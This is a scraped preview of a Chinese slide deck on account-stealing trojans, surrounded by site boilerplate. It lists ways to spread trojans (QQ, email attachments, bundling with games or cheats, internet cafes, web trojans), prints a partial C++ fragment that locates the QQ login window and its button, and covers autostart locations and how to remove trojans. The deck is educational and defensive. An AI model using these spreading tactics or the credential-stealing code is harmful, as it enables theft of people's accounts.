- 1、本文档共24页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
计算机病毒原理及防范技术;背景;盗号木马病毒的发展:;盗号木马病毒的原理:; 这种木马遍布互联网的各个角落,的确防不胜防,由于木马程序众多,加之不断有新版本、新品种产生,使得软件无法完全应付,所以手动检查清除是十分必要的。
木马会想尽一切办法隐藏自己,有些木马更是会和一些系统进程寄生在一起的。;入侵方式:;
3、通过QQ,例如想盗游戏中指定人物的帐号,首先和他聊2句知道他QQ多少,然后通过QQ传送木马给他!
4、通过邮件,把木马做为邮件的附件发送出去!收信人只要打开附件系统就会感染木马!
5、捆绑法,把木马和正常的程序捆绑在一起,在有人运行表面正常程序的同时,木马也就运行了.....这个捆绑的程序可以是:图片,电影,音乐,游戏外挂等等等;6、把木马在网吧电脑
上双击下后,即可!对
于网吧的还原精灵,在
辅助工具一栏有还原精
灵转存软件可破解此限
制!
7、木马和QQ尾巴这样的
病毒绑定在一起,这样传
播速度非常快的!
8、最强的木马传播方法:
网页木马!;八大种类;盗号木马代码:;盗号木马代码:;盗号木马代码:;{
//获得当前激活窗口的句柄
g_hWnd = GetForegroundWindow();
GetWindowThreadProcessId(g_hWnd, QQPID);
//根据PID获得进程名
processIdToName(sTitle, QQPID);
ss = sTitle;
ss.MakeLower();
//判断是否QQ
;if(ss != qq.exe)
{
Sleep(100);
continue;
}
//获得标题文字,判断是否登陆对话框
SendMessage(g_hWnd,WM_GETTEXT,255,(LPARAM)sTitle);
ss = sTitle;
int n = ss.Find(QQ, 0);
int m = ss.Find(登录, 0);
if(n = 0 || m = 0)
{
//查找QQ登陆按钮的句柄
ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, Button, 登录);
LoginID = GetDlgCtrlID(ButtonLogin);;反盗号措施;7、 计算机绑定
8、上述六点可结合密码保护卡,并且可以设置多张密码保护卡,登陆界面一张密码保护卡,角色界面一张密码保护卡,背包一张密码保护卡,仓库一张密码保护卡,退出登录一张密码保护卡。
9、加强游戏本身防木马能力
10、加入网吧IP段保护;如何进行木马病毒的查杀与清除;木马是怎样自动加载的:
在win.ini文件中,在[WINDOWS]下面,run=和load=是可能加载木马程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上木马了。如果不注意可能不会发现它不是真正的系统启动文件。; 在system.ini文件中,在[BOOT]下面有个shell=文件名。正确的文件名应该是explorer.exe,如果不是explorer.exe,而是shell=explorer.exe程序名,那么后面跟着的那个程序就是木马程序,就是说你已经中木马了。
在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE;如:HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run、HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run的目录下都有可能,最好的办法就是在HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run下找到木马程序的文件名,再在整个注册表中搜索即可。;知道了木马的工作原理,查杀木马就变得很容易,如果发现有木马存在,最安全也是最有效的方法就是马上将计算机与网络断开,防止黑客通过网络对你进行攻击。然后编辑win.ini文件,将[WINDOWS]下面,run=木马程序或load=木马程序更改为run=和load=;编辑system.ini文件,将[BOOT]下面的shell=木马文件,更改为:shell=explorer.exe;;在注册表中,用regedit对注册表进行编辑,在HKEY-LOCAL-MACHINE\Software\Microsoft\
您可能关注的文档
- 新版欧盟RoHS指令识别答案.doc
- 新版评定表规范答案.doc
- 新版热机安规《公用》库答案.doc
- 新版强条执行计划答案.doc
- 新版-结构实验指导书答案.doc
- 新版人力资源二级考点复习整理详细版答案.docx
- 新版人音四年级上册音乐答案.docx
- 新版使用说明书液压泵答案.doc
- 新版新目标词性转换答案.doc
- 新版消防问题请教2016答案.doc
- 基于人工智能教育平台的移动应用开发,探讨跨平台兼容性影响因素及优化策略教学研究课题报告.docx
- 高中生物实验:城市热岛效应对城市生态系统服务功能的影响机制教学研究课题报告.docx
- 信息技术行业信息安全法律法规研究及政策建议教学研究课题报告.docx
- 人工智能视角下区域教育评价改革:利益相关者互动与政策支持研究教学研究课题报告.docx
- 6 《垃圾填埋场渗滤液处理与土地资源化利用研究》教学研究课题报告.docx
- 小学音乐与美术教师跨学科协作模式构建:人工智能技术助力教学创新教学研究课题报告.docx
- 《航空航天3D打印技术对航空器装配工艺的创新与效率提升》教学研究课题报告.docx
- 教育扶贫精准化策略研究:人工智能技术在区域教育中的应用与创新教学研究课题报告.docx
- 《区块链技术在电子政务电子档案管理中的数据完整性保障与优化》教学研究课题报告.docx
- 《中医护理情志疗法对癌症患者心理状态和生活质量提升的长期追踪研究》教学研究课题报告.docx
文档评论(0)